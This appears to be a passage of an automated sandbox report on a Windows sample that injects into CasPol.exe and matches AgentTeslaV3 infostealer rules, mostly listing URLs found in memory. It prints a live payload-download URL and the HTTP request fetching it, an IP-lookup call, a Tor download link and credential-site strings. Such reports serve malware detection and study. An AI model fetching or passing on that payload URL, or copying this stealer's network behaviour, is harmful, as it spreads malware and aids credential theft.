Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863954723.0000000021435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: CasPol.exe, 00000005.00000003.251767926056.0000000021482000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766960137.0000000021482000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863163502.0000000021459000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: 9TpV4rfMmJ.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255522813651.00000000214A7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.eme.lv/repository0
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oaticerts.com/repository.
Source: CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: CasPol.exe, 00000005.00000003.251768856245.000000002144A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: CasPol.exe, 00000005.00000003.251768856245.000000002144A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863163502.0000000021459000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: CasPol.exe, 00000005.00000003.251766468796.000000002149D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: CasPol.exe, 00000005.00000002.255514393280.000000001DF65000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251753818478.000000002017E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521171417.000000002013F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521466779.000000002017F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: CasPol.exe, 00000005.00000002.255514393280.000000001DF65000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251753818478.000000002017E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521171417.000000002013F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521466779.000000002017F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xMIMbL.com
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%4
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eca.hinet.net/repository0
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: CasPol.exe, 00000005.00000003.251766468796.000000002149D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: 9TpV4rfMmJ.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.konutmarket.com/
Source: CasPol.exe, 00000005.00000002.255487878510.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.konutmarket.com/(
Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251683674631.0000000000E9A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.konutmarket.com/2022file_izNuHdosu25.bin
Source: CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.konutmarket.com/2022file_izNuHdosu25.binI
Source: CasPol.exe, 00000005.00000003.251764848200.00000000214AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: CasPol.exe, 00000005.00000002.255522691089.000000002148F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768056928.000000002148F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown

DNS traffic detected: queries for: www.konutmarket.com

Source: global traffic

HTTP traffic detected: GET /2022file_izNuHdosu25.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.konutmarket.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 178.18.206.58:443 -> 192.168.11.20:49803 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe

Code function: 2_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004056DE

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Uses 32bit PE files

Source: 9TpV4rfMmJ.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe

Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_0040352D

Detected potential crypto function

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_0040755C	2_2_0040755C
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_00406D85	2_2_00406D85
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Code function: 2_2_71661BFF	2_2_71661BFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00D0F35C	5_2_00D0F35C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01169178	5_2_01169178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0116CC8E	5_2_0116CC8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0116AB90	5_2_0116AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01163330	5_2_01163330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0116A770	5_2_0116A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_012021D8	5_2_012021D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01200040	5_2_01200040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_012048B8	5_2_012048B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_012259B8	5_2_012259B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0122A4F0	5_2_0122A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0122EB68	5_2_0122EB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01222740	5_2_01222740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01222B90	5_2_01222B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01225E3E	5_2_01225E3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01223242	5_2_01223242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01220040	5_2_01220040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0122EF18	5_2_0122EF18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0122AE59	5_2_0122AE59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1DCB5E48	5_2_1DCB5E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1DCB470C	5_2_1DCB470C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1DCB5D60	5_2_1DCB5D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1DCB6B30	5_2_1DCB6B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20033A50	5_2_20033A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20034320	5_2_20034320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2003C578	5_2_2003C578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2003BF48	5_2_2003BF48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20031120	5_2_20031120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20033708	5_2_20033708

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 20036288 appears 52 times

Sample file is different than original file name gathered from version info

Source: 9TpV4rfMmJ.exe, 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameSxsStore.dllj% vs 9TpV4rfMmJ.exe

PE file contains strange resources

Source: 9TpV4rfMmJ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9TpV4rfMmJ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9TpV4rfMmJ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

PE / OLE file has an invalid certificate

Source: 9TpV4rfMmJ.exe

Static PE information: invalid certificate

Source: 9TpV4rfMmJ.exe	Virustotal: Detection: 15%
Source: 9TpV4rfMmJ.exe	ReversingLabs: Detection: 25%

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe

File read: C:\Users\user\Desktop\9TpV4rfMmJ.exe

Source: unknown	Process created: C:\Users\user\Desktop\9TpV4rfMmJ.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
